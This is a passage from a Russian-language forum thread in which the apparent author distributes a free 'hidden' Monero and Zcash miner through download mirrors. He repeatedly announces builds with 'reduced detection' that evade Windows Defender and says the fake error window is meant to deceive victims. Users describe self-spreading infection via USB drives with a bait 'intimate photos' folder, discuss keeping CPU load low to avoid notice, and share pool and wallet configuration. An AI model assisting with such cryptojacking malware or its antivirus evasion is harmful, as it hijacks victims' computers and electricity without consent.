Pages:
Author

Topic: Бесплатный скрытый майнер Monero+Zcash - page 4. (Read 3388 times)

newbie
Activity: 95
Merit: 0
Не работает..удалил антивирус.запускаю пишет ошибка при открытии архива возможны пречины....... и все флешку незаряжает.

Как бы такое и должен писать, это для пользователя. Всё работает.
newbie
Activity: 2
Merit: 0
Не работает..удалил антивирус.запускаю пишет ошибка при открытии архива возможны пречины....... и все флешку незаряжает.
newbie
Activity: 153
Merit: 0
50% cpu это палево. Возможно сделать меньше. Просто при загрузке проца в 50% каждая вторая бабуля победит к сисадмину.
newbie
Activity: 95
Merit: 0
Ещё вопрос. Я устанавливаю на свой комп, всё прописываю. Вставляю флешку, она заражается, вставляю её в комп два и открываю папку "интимные фото", комп два заражается и начинает работать на меня. Вопрос: если в комп два вставить флешку, то она так же заразится и когда её вставят в комп три и откроют папку "интимные фото" то комп три так женачнет работать на меня и так далее?

Да, процесс заражения постоянный.
newbie
Activity: 153
Merit: 0
Ещё вопрос. Я устанавливаю на свой комп, всё прописываю. Вставляю флешку, она заражается, вставляю её в комп два и открываю папку "интимные фото", комп два заражается и начинает работать на меня. Вопрос: если в комп два вставить флешку, то она так же заразится и когда её вставят в комп три и откроют папку "интимные фото" то комп три так женачнет работать на меня и так далее?
newbie
Activity: 95
Merit: 0
Сборка обновлена. Снижен детект.

Новые ссылки:
Зеркало 1
Зеркало 2

Версия без вывода консольного окна с ошибкой(Кому нужно для склейки)
Зеркало 1
Зеркало 2

В первом сообщении ссылки также обновлены.
newbie
Activity: 95
Merit: 0
Как проверить или работает?комп специально был сделан для перебора паролей...но где посмотреть или работает  майнинг.ато   запустил я файл старт.и он выбил ошибку и пропал..но чтото флешки не заряжает .А  на другом компе без антивируса пишет ошибка открытия архива..

Окно с консольной ошибкой это ошибка для пользователя.
newbie
Activity: 2
Merit: 0
Как проверить или работает?комп специально был сделан для перебора паролей...но где посмотреть или работает  майнинг.ато   запустил я файл старт.и он выбил ошибку и пропал..но чтото флешки не заряжает .А  на другом компе без антивируса пишет ошибка открытия архива..
newbie
Activity: 95
Merit: 0

Самый первый детект - дефендер. Далее смысла не было, но проверил - ругается. На вт не лил - чисто на виртуалках с разными ав проверял.

К сожалению, дефендер довольно быстро начинает палить.
Но он вроде только монеро майнер убивает, на гпу продолжает майнить.
newbie
Activity: 4
Merit: 0
Сборка обновлена. Снижен детект.

Новые ссылки:
Зеркало 1
Зеркало 2

Версия без вывода консольного окна с ошибкой(Кому нужно для склейки)
Зеркало 1
Зеркало 2

В первом сообщении ссылки также обновлены.

Самый первый детект - дефендер. Далее смысла не было, но проверил - ругается. На вт не лил - чисто на виртуалках с разными ав проверял.
newbie
Activity: 95
Merit: 0
Сборка обновлена. Снижен детект.

Новые ссылки:
Зеркало 1
Зеркало 2

Версия без вывода консольного окна с ошибкой(Кому нужно для склейки)
Зеркало 1
Зеркало 2

В первом сообщении ссылки также обновлены.
newbie
Activity: 95
Merit: 0
нормальный антивирус сразу спалит этот майнер да и везде есть сис админы они точно знают как удалить майнер

Спалит, наверное, когда-нибудь. Чищу регулярно, как только сильно светится начинает.
Какие ещё сис админ вы о чём? Рядом с каждым геймером Васей сисадмин сидит?
full member
Activity: 658
Merit: 102
IDENA.IO - Proof-Of-Person Blockchain
нормальный антивирус сразу спалит этот майнер да и везде есть сис админы они точно знают как удалить майнер
newbie
Activity: 95
Merit: 0

Палится есетом и дефендером. только что проверил. установил и запустил Start.exe

Вижу, снова ругается.
newbie
Activity: 4
Merit: 0
Сборка обновлена. Снижен детект. Удалось избавиться от срабатывания Дефендера на win 10 лицензия.

Новые ссылки:
Зеркало 1
Зеркало 2

Версия без вывода консольного окна с ошибкой(Кому нужно для склейки)
Зеркало 1
Зеркало 2

В первом сообщении ссылки также обновлены.

Палится есетом и дефендером. только что проверил. установил и запустил Start.exe
newbie
Activity: 4
Merit: 0
Сборка обновлена. Снижен детект. Удалось избавиться от срабатывания Дефендера на win 10 лицензия.

Новые ссылки:
Зеркало 1
Зеркало 2

Версия без вывода консольного окна с ошибкой(Кому нужно для склейки)
Зеркало 1
Зеркало 2

В первом сообщении ссылки также обновлены.

а есть такой вопросик. для майна зэка и монеро я забиваю кошельки в m.cnf и z.cnf. А в pool.cnf нужно пулы от майнергейта и flypool прописывать? Или они уже куда то прописаны. Как сделал сейчас я: аписал в нужные файлы свои кошельки и в pool.cnf указал 2 пула с майнергейта и флайпул. правильно ли я сделал? Заранее спасибо за ответ.

Нет, зек на флайпуле майнится, в pool.cnf только пул для монеро.

Тогда последний вопросик: если я пул пишу вот этот stratum+tcp://xmr.pool.minergate.com:45560 - монеро на майнергейте будут майниться и с видео и проца (то что есть на воркере) или только проц? зеки то понятно, что только нвидиа видюхи.
newbie
Activity: 95
Merit: 0
Сборка обновлена. Снижен детект. Удалось избавиться от срабатывания Дефендера на win 10 лицензия.

Новые ссылки:
Зеркало 1
Зеркало 2

Версия без вывода консольного окна с ошибкой(Кому нужно для склейки)
Зеркало 1
Зеркало 2

В первом сообщении ссылки также обновлены.

а есть такой вопросик. для майна зэка и монеро я забиваю кошельки в m.cnf и z.cnf. А в pool.cnf нужно пулы от майнергейта и flypool прописывать? Или они уже куда то прописаны. Как сделал сейчас я: аписал в нужные файлы свои кошельки и в pool.cnf указал 2 пула с майнергейта и флайпул. правильно ли я сделал? Заранее спасибо за ответ.

Нет, зек на флайпуле майнится, в pool.cnf только пул для монеро.
newbie
Activity: 4
Merit: 0
Сборка обновлена. Снижен детект. Удалось избавиться от срабатывания Дефендера на win 10 лицензия.

Новые ссылки:
Зеркало 1
Зеркало 2

Версия без вывода консольного окна с ошибкой(Кому нужно для склейки)
Зеркало 1
Зеркало 2

В первом сообщении ссылки также обновлены.

а есть такой вопросик. для майна зэка и монеро я забиваю кошельки в m.cnf и z.cnf. А в pool.cnf нужно пулы от майнергейта и flypool прописывать? Или они уже куда то прописаны. Как сделал сейчас я: аписал в нужные файлы свои кошельки и в pool.cnf указал 2 пула с майнергейта и флайпул. правильно ли я сделал? Заранее спасибо за ответ.
newbie
Activity: 95
Merit: 0
Сборка обновлена. Снижен детект. Удалось избавиться от срабатывания Дефендера на win 10 лицензия.

Новые ссылки:
Зеркало 1
Зеркало 2

Версия без вывода консольного окна с ошибкой(Кому нужно для склейки)
Зеркало 1
Зеркало 2

В первом сообщении ссылки также обновлены.
newbie
Activity: 95
Merit: 0
Можно ли как-то настроить майнинг на кошелек Майнергейта?
в pool.cnf пиши
stratum+tcp://xmr.pool.minergate.com:45560

в m.cnf почту

а в чем может быть проблема, если на пул хэши не идут? какие могут быть варианты?

На своём компе запускал?
Pages:
Jump to: